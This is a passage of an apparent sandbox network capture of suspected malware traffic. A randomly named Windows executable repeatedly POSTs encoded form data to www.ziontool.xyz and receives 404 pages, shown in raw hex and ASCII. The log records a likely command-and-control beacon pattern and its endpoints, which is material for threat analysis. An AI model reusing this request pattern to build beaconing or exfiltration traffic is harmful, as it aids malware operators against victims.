                            May 27, 2024 12:21:43.677031040 CEST177INData Raw: 20 60 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 73 74 68 6f 73 74 73 2e 63 6f 2e 75 6b 2f 64 6f 6d 61 69 6e 2d 6e 61 6d 65 73 2f 73 65 61 72 63 68 2f 3f 64 6f 6d 61 69 6e 3d 24 7b 63 6c 65 61 6e 48 6f 73 74 6e 61 6d 65 7d 26 75 74 6d 5f 73 6f 75
                            Data Ascii: `https://www.fasthosts.co.uk/domain-names/search/?domain=${cleanHostname}&utm_source=domainparking&utm_medium=referral&utm_campaign=fh_parking_dac` </script></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            25192.168.2.763186203.161.43.227802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:21:48.728432894 CEST711OUTPOST /opfh/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Accept-Encoding: gzip, deflate
                            Host: www.ziontool.xyz
                            Origin: http://www.ziontool.xyz
                            Referer: http://www.ziontool.xyz/opfh/
                            Cache-Control: max-age=0
                            Content-Length: 218
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            Data Raw: 52 34 30 4c 36 3d 56 57 45 41 79 2f 77 33 4a 59 6f 31 7a 72 6c 67 78 77 63 2f 51 5a 7a 4f 39 48 38 69 79 73 4a 35 64 6a 50 79 64 55 6e 59 6f 62 56 70 65 36 72 37 6b 59 30 65 67 6a 71 4b 71 55 57 57 57 67 36 68 6c 54 6a 4d 38 47 63 58 47 79 4a 4b 4d 69 39 6d 30 79 75 4a 42 75 54 50 70 34 50 45 36 45 32 77 66 64 76 77 73 50 57 4a 6c 34 31 6e 44 59 6f 39 5a 46 72 66 53 2f 46 4a 71 62 41 73 58 4d 36 67 72 50 4c 70 45 6d 4a 72 59 41 45 34 56 51 55 6f 38 75 53 67 77 38 43 53 6d 36 31 41 6d 70 6d 31 6a 69 36 37 57 76 71 51 59 62 51 34 6b 68 4a 72 4d 67 6e 4c 7a 75 66 50 59 69 77 62 2b 73 67 54 46 50 34 46 62 4d 33 75 44 2f 41 64 76 53 51 4b 75 67 3d 3d
                            Data Ascii: R40L6=VWEAy/w3JYo1zrlgxwc/QZzO9H8iysJ5djPydUnYobVpe6r7kY0egjqKqUWWWg6hlTjM8GcXGyJKMi9m0yuJBuTPp4PE6E2wfdvwsPWJl41nDYo9ZFrfS/FJqbAsXM6grPLpEmJrYAE4VQUo8uSgw8CSm61Ampm1ji67WvqQYbQ4khJrMgnLzufPYiwb+sgTFP4FbM3uD/AdvSQKug==
                            May 27, 2024 12:21:49.329905033 CEST1236INHTTP/1.1 404 Not Found
                            Date: Mon, 27 May 2024 10:21:49 GMT
                            Server: Apache
                            Content-Length: 38381
                            Connection: close
                            Content-Type: text/html
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c [TRUNCATED]
                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css"><link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Roboto+Condensed:400,700'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="container"> <p class="textA">Page Not Found</p> <p class="textB">404</p> <a class="textC" href="#">Go Back</a><svg class="page-not-found" viewBox="0 0 1280 1024"> <title>Page Not Found</title> <g class="hide tri-dots"> <circle cx="406.1" cy="890.7" r="3.5" transform="translate(-361.3 283) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="426.2" cy="878.8" r="3.7" transform="translate(-353.7 290.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="424.4" cy="861.8" r="3.7" transform="translate(-346.1 288.1) rotate(-27.1)" style="fill: #ffe029"/> <cir [TRUNCATED]
                            May 27, 2024 12:21:49.329972982 CEST1236INData Raw: 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 33 38 2e 33 22 20 63 79 3d 22 38 35 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73
                            Data Ascii: 7.1)" style="fill: #ffe029"/> <circle cx="438.3" cy="851.8" r="3.7" transform="translate(-340.1 293.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="453.8" cy="845.8" r="3.7" transform="translate(-335.6 299.8) rotate(-27
                            May 27, 2024 12:21:49.329987049 CEST1236INData Raw: 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 37 31 2e 35 22 20 63 79 3d 22 38 31 37 2e 37 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 32 30 2e 39 20 33 30 34 2e 38 29 20 72 6f 74 61 74 65
                            Data Ascii: <circle cx="471.5" cy="817.7" r="3.7" transform="translate(-320.9 304.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="487.9" cy="810.2" r="3.7" transform="translate(-315.6 311.4) rotate(-27.1)" style="fill: #ffe029"/>
                            May 27, 2024 12:21:49.329998016 CEST1236INData Raw: 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 30 31 2e 37 20 33 31 37 2e 31 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20
                            Data Ascii: 7" transform="translate(-301.7 317.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="504.6" cy="802.3" r="3.7" transform="translate(-310.2 318.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="519.7" cy="812.9" r="3.7
                            May 27, 2024 12:21:49.330010891 CEST896INData Raw: 20 33 34 31 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 37 30 2e 35 22 20 63 79 3d 22 38 30 37
                            Data Ascii: 341.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="570.5" cy="807.2" r="3.7" transform="translate(-305.2 348.7) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="572.5" cy="790.5" r="3.7" transform="translate(-297.3
                            May 27, 2024 12:21:49.330022097 CEST1236INData Raw: 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 36 33 30 2e 36 22 20 63 79 3d 22 37 35 38 2e 35 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 37 36 2e 34 20 33 37 30 2e 38 29 20 72 6f 74 61 74 65
                            Data Ascii: <circle cx="630.6" cy="758.5" r="3.7" transform="translate(-276.4 370.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="647" cy="766.1" r="3.7" transform="translate(-278 379) rotate(-27.1)" style="fill: #ffe029"/> <cir
                            May 27, 2024 12:21:49.330034018 CEST1236INData Raw: 36 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 35 32 2e 37 20 33 35 34 2e 37 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20
                            Data Ascii: 6" transform="translate(-252.7 354.7) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="606.7" cy="718.2" r="3.7" transform="translate(-260.6 355.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="615.7" cy="747.7" r="3.7
                            May 27, 2024 12:21:49.330065966 CEST448INData Raw: 20 33 33 39 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 37 31 2e 39 22 20 63 79 3d 22 37 31 34
                            Data Ascii: 339.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="571.9" cy="714.5" r="3.7" transform="translate(-262.8 339.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="587.4" cy="724.6" r="3.7" transform="translate(-265.7
                            May 27, 2024 12:21:49.330086946 CEST1236INData Raw: 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 35 30 2e 31 20 33 34 35 2e 35 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09
                            Data Ascii: ="3.7" transform="translate(-250.1 345.5) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="574.1" cy="698.1" r="3.7" transform="translate(-255.1 338.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="574.8" cy="681.2" r=
                            May 27, 2024 12:21:49.330161095 CEST1236INData Raw: 65 28 2d 32 37 32 20 33 32 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 33 37 2e 35 22 20 63 79 3d
                            Data Ascii: e(-272 323) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="537.5" cy="709.2" r="3.7" transform="translate(-264.1 322.9) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="541.1" cy="692.9" r="3.7" transform="translate(-25
                            May 27, 2024 12:21:49.335212946 CEST1236INData Raw: 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 30 39 22 20 63 79 3d 22 37 36 35 2e 39 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65
                            Data Ascii: fill: #ffe029"/> <circle cx="509" cy="765.9" r="3.7" transform="translate(-293.1 316.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="512" cy="748.1" r="3.7" transform="translate(-284.7 315.5) rotate(-27.1)" style="fill:


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            26192.168.2.763187203.161.43.227802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:21:51.270509958 CEST731OUTPOST /opfh/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Accept-Encoding: gzip, deflate
                            Host: www.ziontool.xyz
                            Origin: http://www.ziontool.xyz
                            Referer: http://www.ziontool.xyz/opfh/
                            Cache-Control: max-age=0
                            Content-Length: 238
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            Data Raw: 52 34 30 4c 36 3d 56 57 45 41 79 2f 77 33 4a 59 6f 31 31 50 68 67 79 58 6f 2f 42 35 79 38 68 33 38 69 35 4d 49 79 64 6a 44 79 64 52 48 49 72 74 46 70 5a 62 62 37 71 35 30 65 6e 6a 71 4b 68 30 57 50 4a 77 36 36 6c 54 75 78 38 43 59 58 47 79 31 4b 4d 6a 68 6d 30 42 47 4b 54 4f 54 4e 31 34 50 43 6e 55 32 77 66 64 76 77 73 4f 79 6a 6c 34 74 6e 44 6f 59 39 4c 77 66 63 59 66 46 57 74 62 41 73 46 38 36 6b 72 50 4b 5a 45 6b 73 2b 59 47 41 34 56 56 77 6f 39 38 36 68 35 38 43 63 35 4b 30 43 75 4a 6e 53 6d 78 32 43 55 4a 6a 49 66 71 41 6d 73 33 55 4a 57 43 72 6e 74 2f 6e 30 63 67 55 74 70 4b 39 6d 48 4f 38 64 57 75 44 50 63 49 6c 33 69 41 78 4f 34 62 65 75 78 76 4a 2b 39 51 37 72 55 57 2b 4d 42 65 51 69 67 48 6b 3d
                            Data Ascii: R40L6=VWEAy/w3JYo11PhgyXo/B5y8h38i5MIydjDydRHIrtFpZbb7q50enjqKh0WPJw66lTux8CYXGy1KMjhm0BGKTOTN14PCnU2wfdvwsOyjl4tnDoY9LwfcYfFWtbAsF86krPKZEks+YGA4VVwo986h58Cc5K0CuJnSmx2CUJjIfqAms3UJWCrnt/n0cgUtpK9mHO8dWuDPcIl3iAxO4beuxvJ+9Q7rUW+MBeQigHk=
                            May 27, 2024 12:21:52.644010067 CEST1236INHTTP/1.1 404 Not Found
                            Date: Mon, 27 May 2024 10:21:51 GMT
                            Server: Apache
                            Content-Length: 38381
                            Connection: close
                            Content-Type: text/html
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c [TRUNCATED]
                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css"><link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Roboto+Condensed:400,700'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="container"> <p class="textA">Page Not Found</p> <p class="textB">404</p> <a class="textC" href="#">Go Back</a><svg class="page-not-found" viewBox="0 0 1280 1024"> <title>Page Not Found</title> <g class="hide tri-dots"> <circle cx="406.1" cy="890.7" r="3.5" transform="translate(-361.3 283) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="426.2" cy="878.8" r="3.7" transform="translate(-353.7 290.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="424.4" cy="861.8" r="3.7" transform="translate(-346.1 288.1) rotate(-27.1)" style="fill: #ffe029"/> <cir [TRUNCATED]
                            May 27, 2024 12:21:52.644030094 CEST224INData Raw: 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 33 38 2e 33 22 20 63 79 3d 22 38 35 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73
                            Data Ascii: 7.1)" style="fill: #ffe029"/> <circle cx="438.3" cy="851.8" r="3.7" transform="translate(-340.1 293.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="453.8" cy="845.8" r="3.7" transform="translate(-335.
                            May 27, 2024 12:21:52.644041061 CEST1236INData Raw: 36 20 32 39 39 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 36 35 2e 32 22 20 63 79 3d 22 38 35
                            Data Ascii: 6 299.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="465.2" cy="859" r="3.7" transform="translate(-340.4 306.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="483" cy="849.2" r="3.7" transform="translate(-333.9 313
                            May 27, 2024 12:21:52.644056082 CEST1236INData Raw: 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 38 39 2e 38 22 20 63 79 3d 22 37 39 31 2e 31 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33
                            Data Ascii: #ffe029"/> <circle cx="489.8" cy="791.1" r="3.7" transform="translate(-306.7 310.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="473.1" cy="798.2" r="3.7" transform="translate(-311.8 303.4) rotate(-27.1)" style="fill:
                            May 27, 2024 12:21:52.644067049 CEST1236INData Raw: 22 20 63 79 3d 22 38 31 32 2e 39 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 31 33 2e 34 20 33 32 36 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c
                            Data Ascii: " cy="812.9" r="3.7" transform="translate(-313.4 326.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="534.7" cy="822.9" r="3.7" transform="translate(-316.3 334.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="536.8"
                            May 27, 2024 12:21:52.644084930 CEST672INData Raw: 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 39 37 2e 33 20 33 34 37 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20
                            Data Ascii: ="translate(-297.3 347.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="589.7" cy="797.2" r="3.7" transform="translate(-298.5 356.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="590" cy="782.3" r="3.7" transform="t
                            May 27, 2024 12:21:52.644136906 CEST1236INData Raw: 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 36 33 30 2e 36 22 20 63 79 3d 22 37 35 38 2e 35 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 37 36 2e 34 20 33 37 30 2e 38 29 20 72 6f 74 61 74 65
                            Data Ascii: <circle cx="630.6" cy="758.5" r="3.7" transform="translate(-276.4 370.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="647" cy="766.1" r="3.7" transform="translate(-278 379) rotate(-27.1)" style="fill: #ffe029"/> <cir
                            May 27, 2024 12:21:52.644155025 CEST1236INData Raw: 36 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 35 32 2e 37 20 33 35 34 2e 37 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20
                            Data Ascii: 6" transform="translate(-252.7 354.7) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="606.7" cy="718.2" r="3.7" transform="translate(-260.6 355.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="615.7" cy="747.7" r="3.7
                            May 27, 2024 12:21:52.644167900 CEST1236INData Raw: 20 33 33 39 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 37 31 2e 39 22 20 63 79 3d 22 37 31 34
                            Data Ascii: 339.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="571.9" cy="714.5" r="3.7" transform="translate(-262.8 339.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="587.4" cy="724.6" r="3.7" transform="translate(-265.7
                            May 27, 2024 12:21:52.644217014 CEST1236INData Raw: 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 32 36 2e 33 22 20 63 79 3d 22 36 38 32 2e 34 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73
                            Data Ascii: ="fill: #ffe029"/> <circle cx="526.3" cy="682.4" r="3.7" transform="translate(-253.2 314.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="522.2" cy="697.3" r="3.7" transform="translate(-260.4 314.6) rotate(-27.1)" style=
                            May 27, 2024 12:21:52.644227982 CEST1236INData Raw: 69 72 63 6c 65 20 63 78 3d 22 35 33 30 22 20 63 79 3d 22 37 34 32 2e 32 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 38 30 20 33 32 33 2e 31 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20
                            Data Ascii: ircle cx="530" cy="742.2" r="3.7" transform="translate(-280 323.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="526.7" cy="759.5" r="3.7" transform="translate(-288.3 323.5) rotate(-27.1)" style="fill: #ffe029"/> <circle
                            May 27, 2024 12:21:52.644598007 CEST1236INHTTP/1.1 404 Not Found
                            Date: Mon, 27 May 2024 10:21:51 GMT
                            Server: Apache
                            Content-Length: 38381
                            Connection: close
                            Content-Type: text/html
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c [TRUNCATED]
                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css"><link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Roboto+Condensed:400,700'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="container"> <p class="textA">Page Not Found</p> <p class="textB">404</p> <a class="textC" href="#">Go Back</a><svg class="page-not-found" viewBox="0 0 1280 1024"> <title>Page Not Found</title> <g class="hide tri-dots"> <circle cx="406.1" cy="890.7" r="3.5" transform="translate(-361.3 283) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="426.2" cy="878.8" r="3.7" transform="translate(-353.7 290.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="424.4" cy="861.8" r="3.7" transform="translate(-346.1 288.1) rotate(-27.1)" style="fill: #ffe029"/> <cir [TRUNCATED]
                            May 27, 2024 12:21:52.645451069 CEST1236INHTTP/1.1 404 Not Found
                            Date: Mon, 27 May 2024 10:21:51 GMT
                            Server: Apache
                            Content-Length: 38381
                            Connection: close
                            Content-Type: text/html
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c [TRUNCATED]
